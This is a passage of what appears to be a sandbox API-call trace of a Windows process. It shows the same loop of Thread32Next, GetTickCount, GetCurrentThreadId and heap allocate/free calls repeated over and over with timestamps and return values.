(hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.095] GetTickCount () returned 0x1138d61 [0212.095] GetCurrentThreadId () returned 0x1cc [0212.096] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.096] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.096] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.096] GetTickCount () returned 0x1138d61 [0212.096] GetCurrentThreadId () returned 0x1cc [0212.096] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.097] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.097] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.097] GetTickCount () returned 0x1138d61 [0212.097] GetCurrentThreadId () returned 0x1cc [0212.097] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.097] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.097] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.098] GetTickCount () returned 0x1138d61 [0212.098] GetCurrentThreadId () returned 0x1cc [0212.098] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.098] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.098] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.099] GetTickCount () returned 0x1138d61 [0212.099] GetCurrentThreadId () returned 0x1cc [0212.099] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.099] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.099] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.100] GetTickCount () returned 0x1138d71 [0212.101] GetCurrentThreadId () returned 0x1cc [0212.101] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.101] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.101] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.101] GetTickCount () returned 0x1138d71 [0212.101] GetCurrentThreadId () returned 0x1cc [0212.101] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.102] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.102] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.102] GetTickCount () returned 0x1138d71 [0212.102] GetCurrentThreadId () returned 0x1cc [0212.102] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.102] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.103] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.103] GetTickCount () returned 0x1138d71 [0212.103] GetCurrentThreadId () returned 0x1cc [0212.103] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.103] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.103] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.104] GetTickCount () returned 0x1138d71 [0212.104] GetCurrentThreadId () returned 0x1cc [0212.104] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.104] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.104] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.105] GetTickCount () returned 0x1138d71 [0212.105] GetCurrentThreadId () returned 0x1cc [0212.105] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.105] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.105] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.106] GetTickCount () returned 0x1138d71 [0212.106] GetCurrentThreadId () returned 0x1cc [0212.106] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.106] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.106] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.108] GetTickCount () returned 0x1138d71 [0212.108] GetCurrentThreadId () returned 0x1cc [0212.108] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.108] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.108] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.109] GetTickCount () returned 0x1138d71 [0212.109] GetCurrentThreadId () returned 0x1cc [0212.109] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.109] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.109] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.110] GetTickCount () returned 0x1138d71 [0212.110] GetCurrentThreadId () returned 0x1cc [0212.110] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.110] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.110] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.111] GetTickCount () returned 0x1138d71 [0212.111] GetCurrentThreadId () returned 0x1cc [0212.111] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.111] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.111] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.111] GetTickCount () returned 0x1138d71 [0212.112] GetCurrentThreadId () returned 0x1cc [0212.112] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.112] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.112] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.112] GetTickCount () returned 0x1138d71 [0212.112] GetCurrentThreadId () returned 0x1cc [0212.112] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.113] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.113] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.113] GetTickCount () returned 0x1138d71 [0212.113] GetCurrentThreadId () returned 0x1cc [0212.113] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.114] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.114] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.114] GetTickCount () returned 0x1138d71 [0212.114] GetCurrentThreadId () returned 0x1cc [0212.114] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.114] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.114] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.115] GetTickCount () returned 0x1138d71 [0212.115] GetCurrentThreadId () returned 0x1cc [0212.115] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.115] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.115] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.116] GetTickCount () returned 0x1138d81 [0212.116] GetCurrentThreadId () returned 0x1cc [0212.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.117] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.117] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.117] GetTickCount () returned 0x1138d81 [0212.117] GetCurrentThreadId () returned 0x1cc [0212.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.117] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.117] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.118] GetTickCount () returned 0x1138d81 [0212.118] GetCurrentThreadId () returned 0x1cc [0212.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.118] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.119] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.119] GetTickCount () returned 0x1138d81 [0212.119] GetCurrentThreadId () returned 0x1cc [0212.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.119] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.119] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.120] GetTickCount () returned 0x1138d81 [0212.120] GetCurrentThreadId () returned 0x1cc [0212.120] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.120] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.120] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.121] GetTickCount () returned 0x1138d81 [0212.121] GetCurrentThreadId () returned 0x1cc [0212.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.121] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.121] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.122] GetTickCount () returned 0x1138d81 [0212.122] GetCurrentThreadId () returned 0x1cc [0212.122] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.122] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.122] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.123] GetTickCount () returned 0x1138d81 [0212.123] GetCurrentThreadId () returned 0x1cc [0212.123] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.123] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.123] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.124] GetTickCount () returned 0x1138d81 [0212.124] GetCurrentThreadId () returned 0x1cc [0212.124] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.124] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.124] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.125] GetTickCount () returned 0x1138d81 [0212.125] GetCurrentThreadId () returned 0x1cc [0212.125] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.125] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.125] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.126] GetTickCount () returned 0x1138d81 [0212.126] GetCurrentThreadId () returned 0x1cc [0212.126] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.126] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.126] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.127] GetTickCount () returned 0x1138d81 [0212.127] GetCurrentThreadId () returned 0x1cc [0212.127] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.127] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.127] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.128] GetTickCount () returned 0x1138d81 [0212.128] GetCurrentThreadId () returned 0x1cc [0212.128] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.128] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.128] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.129] GetTickCount () returned 0x1138d81 [0212.129] GetCurrentThreadId () returned 0x1cc [0212.129] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.129] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.129] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.130] GetTickCount () returned 0x1138d81 [0212.130] GetCurrentThreadId () returned 0x1cc [0212.130] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.130] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.130] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.131] GetTickCount () returned 0x1138d81 [0212.131] GetCurrentThreadId () returned 0x1cc [0212.131] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.131] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.131] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.132] GetTickCount () returned 0x1138d90 [0212.132] GetCurrentThreadId () returned 0x1cc [0212.132] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.132] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.132] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.133] GetTickCount () returned 0x1138d90 [0212.133] GetCurrentThreadId () returned 0x1cc [0212.133] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.133] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.133] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.134] GetTickCount () returned 0x1138d90 [0212.134] GetCurrentThreadId () returned 0x1cc [0212.134] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.134] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.134] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.135] GetTickCount () returned 0x1138d90 [0212.135] GetCurrentThreadId () returned 0x1cc [0212.135] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.135] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.135] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.136] GetTickCount () returned 0x1138d90 [0212.136] GetCurrentThreadId () returned 0x1cc [0212.136] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.136] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.136] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.137] GetTickCount () returned 0x1138d90 [0212.137] GetCurrentThreadId () returned 0x1cc [0212.137] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.137] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.137] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.137] GetTickCount () returned 0x1138d90 [0212.137] GetCurrentThreadId () returned 0x1cc [0212.138] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.138] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.138] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.138] GetTickCount () returned 0x1138d90 [0212.138] GetCurrentThreadId () returned 0x1cc [0212.138] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.139] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.139] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.139] GetTickCount () returned 0x1138d90 [0212.139] GetCurrentThreadId () returned 0x1cc [0212.139] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.139] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.140] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.140] GetTickCount () returned 0x1138d90 [0212.140] GetCurrentThreadId () returned 0x1cc [0212.140] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.140] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.140] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.141] GetTickCount () returned 0x1138d90 [0212.141] GetCurrentThreadId () returned 0x1cc [0212.141] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.141] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.141] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.142] GetTickCount () returned 0x1138d90 [0212.142] GetCurrentThreadId () returned 0x1cc [0212.142] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.142] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.142] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.143] GetTickCount () returned 0x1138d90 [0212.143] GetCurrentThreadId () returned 0x1cc [0212.143] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.143] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.143] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.144] GetTickCount () returned 0x1138d90 [0212.144] GetCurrentThreadId () returned 0x1cc [0212.144] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.144] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.144] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.145] GetTickCount () returned 0x1138d90 [0212.145] GetCurrentThreadId () returned 0x1cc [0212.145] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.145] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.145] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.146] GetTickCount () returned 0x1138d90 [0212.146] GetCurrentThreadId () returned 0x1cc [0212.146] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.146] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.146] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.147] GetTickCount () returned 0x1138d90 [0212.147] GetCurrentThreadId () returned 0x1cc [0212.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.147] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.147] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.148] GetTickCount () returned 0x1138da0 [0212.148] GetCurrentThreadId () returned 0x1cc [0212.148] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.148] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.148] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.149] GetTickCount () returned 0x1138da0 [0212.149] GetCurrentThreadId () returned 0x1cc [0212.149] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.149] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.149] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.150] GetTickCount () returned 0x1138da0 [0212.150] GetCurrentThreadId () returned 0x1cc [0212.150] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.150] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.150] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.150] GetTickCount () returned 0x1138da0 [0212.151] GetCurrentThreadId () returned 0x1cc [0212.151] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.151] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.151] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.151] GetTickCount () returned 0x1138da0 [0212.152] GetCurrentThreadId () returned 0x1cc [0212.152] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.152] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.152] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.152] GetTickCount () returned 0x1138da0 [0212.152] GetCurrentThreadId () returned 0x1cc [0212.153] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.153] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.153] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.153] GetTickCount () returned 0x1138da0 [0212.153] GetCurrentThreadId () returned 0x1cc [0212.153] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.153] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.154] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.154] GetTickCount () returned 0x1138da0 [0212.154] GetCurrentThreadId () returned 0x1cc [0212.154] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.154] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.154] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.155] GetTickCount () returned 0x1138da0 [0212.155] GetCurrentThreadId () returned 0x1cc [0212.155] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.155] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.155] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.156] GetTickCount () returned 0x1138da0 [0212.156] GetCurrentThreadId () returned 0x1cc [0212.156] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.156] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.156] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.157] GetTickCount () returned 0x1138da0 [0212.157] GetCurrentThreadId () returned 0x1cc [0212.157] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.157] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.157] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.158] GetTickCount () returned 0x1138da0 [0212.158] GetCurrentThreadId () returned 0x1cc [0212.158] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.158] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.158] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.159] GetTickCount () returned 0x1138da0 [0212.159] GetCurrentThreadId () returned 0x1cc [0212.159] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.159] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.159] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.160] GetTickCount () returned 0x1138da0 [0212.160] GetCurrentThreadId () returned 0x1cc [0212.160] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.160] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.160] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.161] GetTickCount () returned 0x1138da0 [0212.161] GetCurrentThreadId () returned 0x1cc [0212.161] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.161] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.161] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.162] GetTickCount () returned 0x1138da0 [0212.162] GetCurrentThreadId () returned 0x1cc [0212.162] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.162] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.163] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.163] GetTickCount () returned 0x1138daf [0212.163] GetCurrentThreadId () returned 0x1cc [0212.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.164] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.164] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.165] GetTickCount () returned 0x1138daf [0212.165] GetCurrentThreadId () returned 0x1cc [0212.165] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.165] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.165] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.166] GetTickCount () returned 0x1138daf [0212.166] GetCurrentThreadId () returned 0x1cc [0212.166] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.166] HeapFree (in: hHeap=0x750000, dwFlags=0x0, 